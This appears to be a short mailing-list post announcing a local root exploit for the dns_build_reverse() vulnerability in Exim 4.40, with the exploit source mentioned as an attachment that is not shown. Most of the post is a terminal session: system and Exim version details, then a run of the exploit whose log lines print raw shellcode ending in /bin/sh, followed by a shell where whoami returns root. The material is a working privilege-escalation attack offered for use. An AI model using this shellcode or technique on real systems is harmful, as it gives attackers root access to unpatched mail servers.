hello punters,
i was bored last night so I coded up a local exploit of the
dns_build_reverse() vulnerability in exim 4.40. hope noone
minds as it was disclosed 5 months ago.
tested on exim 4.40 default build with runtime user as root
rather than exim or mail - hence the rootshell. see below
for versions and system details. "exploit" attached.
regards
plug
============
the details
============
plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686
GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52:
(December 3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm
dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram
redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$
plug@bug:~$
plug@bug:~$ ./exim-exploit
Firing up exim - cross your fingers for shell!
**** SMTP testing session as if from host
::%A:::::::::::::::::1ÀFF V
° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
**** but without any ident (RFC 1413) callback.
ó
**** This is not for real!
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for ::%A:::::::::::::::::1ÀFF V
°
NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
>>> IP address lookup using gethostbyaddr() ó
>>> IP address lookup failed: h_errno=1
LOG: no host name found for IP address
::%A:::::::::::::::::1ÀFF V
° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
sh-2.05b#
ó
sh-2.05b#
sh-2.05b#
sh-2.05b# whoami
root
sh-2.05b#
sh-2.05b# exit
exit
plug@bug:~$
Attachment:
exim-exploit.c
Description: Binary data